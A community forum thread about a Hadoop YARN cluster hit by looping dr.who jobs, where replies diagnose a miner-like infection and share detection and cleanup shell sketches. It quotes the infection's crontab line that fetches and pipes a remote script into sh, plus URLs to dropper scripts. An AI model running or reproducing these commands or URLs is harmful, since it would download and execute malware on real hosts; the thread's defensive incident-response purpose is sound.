Why are there dr.who "MYYARN" applications running and all failing in what seems to be a loop?

New Contributor

We're running an HDP 2.5 cluster, and today we noticed a series of dr.who "MYYARN" applications running, failing, and then being resubmitted to YARN again and again, in what seems to be an "infinite loop". We can't figure out what the applications are doing or why they are failing. Any thoughts? Many thanks in advance!

New Contributor

I experienced the problem on a new cluster: it was flooded with strange jobs from nowhere. In my case, the following was found in the crontab of the 'yarn' user on each host:

*/2 * * * * wget -q -O - http://185.222.210.59/cr.sh | sh > /dev/null 2>&1

So my suggestion is to first check 'sudo -u yarn crontab -l' (or maybe sudo -u dr.who). I still don't know how the hosts were infected.
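
In case it helps anyone doing the same check on several accounts, here is a rough sketch of that crontab inspection. The function names and the regular expression are my own assumptions (a heuristic for "download piped straight into a shell"), not a complete signature for this malware, and the account list is up to you.

```shell
#!/bin/sh
# Print crontab lines (read from stdin) that fetch something with wget or curl
# and pipe it straight into sh or bash.
# The pattern is a heuristic assumption; it will not catch every variant.
find_suspicious_cron() {
    grep -E '(wget|curl)[^|]*\|[[:space:]]*(ba)?sh' || true
}

# Check the crontab of each account given as an argument.
# Needs sudo rights; accounts without a crontab (or that do not exist)
# are silently skipped because stderr is discarded.
check_user_crontabs() {
    for user in "$@"; do
        sudo -u "$user" crontab -l 2>/dev/null |
            find_suspicious_cron |
            awk -v u="$user" '{ print u ": " $0 }'
    done
}
```

On each host this could be called as `check_user_crontabs yarn dr.who`; any output is worth a closer look.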

Super Guru
@David

I ran into something like this recently on a POC cluster. The problem on this cluster was a "yarn" process consuming 100% of the CPU on multiple servers. We shut down all of the HDP services via Ambari to make sure there weren't any rogue HDP processes running. This "yarn" process was still running.

It turns out it was a process running this:

/var/tmp/java -c /var/tmp/w.conf

Killing the process with "kill -9" stopped it only briefly; it respawned a few seconds later. Removing the "/var/tmp/java" file also worked for only a few seconds before the file returned.
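
For anyone trying to spot a process like this, a small sketch of a filter over `ps` output follows. The function name is hypothetical, and the assumption that the binary lives under /tmp or /var/tmp comes only from the cases described in this thread.

```shell
#!/bin/sh
# Filter the output of `ps -eo pid,user,args` (read from stdin) down to
# processes whose command starts with a path under /tmp or /var/tmp.
# Assumes the three-column layout produced by that exact ps invocation.
filter_tmp_processes() {
    awk '$3 ~ /^\/(var\/)?tmp\// { print }'
}

# Example (run on each node):
#   ps -eo pid,user,args | filter_tmp_processes
```

A legitimate job can also run from a temporary directory, so treat a match as a lead rather than proof.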

We ended up looking at crontab and found this:

$ sudo -u yarn crontab -e
*/2 * * * * wget -q -O - http://185.222.210.59/cr.sh | sh > /dev/null 2>&1

We removed the crontab entry, killed the running process, and removed the java file on all nodes. The processes did not return, and we restarted the HDP cluster via Ambari. The root cause appeared to be security group rules on AWS that allowed access to the cluster.

I've seen variations of this reported that run out of /tmp/java and use "h.conf" instead of "w.conf".
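
The cleanup order described above (cron entry first, then the process, then the file) could be scripted roughly as follows. This is only a sketch under assumptions: the function names and the DRY_RUN switch are made up for illustration, the cron pattern is a heuristic, and it relies on a cron implementation that accepts `crontab -u USER -` to read the new crontab from stdin. It defaults to a dry run that only prints what it would do.

```shell
#!/bin/sh
# Drop crontab lines (stdin -> stdout) that pipe a wget/curl download into a shell.
# The pattern is a heuristic assumption, not an exact signature.
strip_dropper_lines() {
    grep -Ev '(wget|curl)[^|]*\|[[:space:]]*(ba)?sh' || true
}

# Run a command, or just print it when DRY_RUN is 1 (the default).
run() {
    if [ "${DRY_RUN:-1}" = 1 ]; then
        echo "would run: $*"
    else
        "$@"
    fi
}

# Clean one host; run as root. The first argument is the affected account.
clean_host() {
    user=${1:-yarn}

    # 1. Remove the cron entry first, otherwise the binary is fetched again.
    if [ "${DRY_RUN:-1}" = 1 ]; then
        echo "would rewrite crontab of $user without dropper lines"
    else
        crontab -u "$user" -l 2>/dev/null | strip_dropper_lines | crontab -u "$user" -
    fi

    # 2. Kill the rogue process, then 3. delete its binary.
    #    Both paths are the ones mentioned in this thread.
    for bin in /var/tmp/java /tmp/java; do
        run pkill -9 -u "$user" -f "^$bin( |\$)"
        run rm -f "$bin"
    done
}
```

Running `clean_host yarn` prints the planned actions; `DRY_RUN=0 clean_host yarn` actually performs them. Review the crontab by hand first, since the filter removes every line that matches the pattern.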

New Contributor

I solved this problem by changing the owner and permissions of the dr.who path:

chown -R root:root /var/log/hadoop/yarn/local/usercache/dr.who
chmod -R 400 /var/log/hadoop/yarn/local/usercache/dr.who

or

chown -R root:root /hadoop/yarn/local/usercache/dr.who
chmod -R 400 /hadoop/yarn/local/usercache/dr.who

Now the NodeManagers no longer stop because of this problem.

avatar

I'm facing a similar issue, where a shell script is being used to do the download and create the cron entry:

https://bitbucket.org/mrandma12/mygit/raw/master/zz.sh
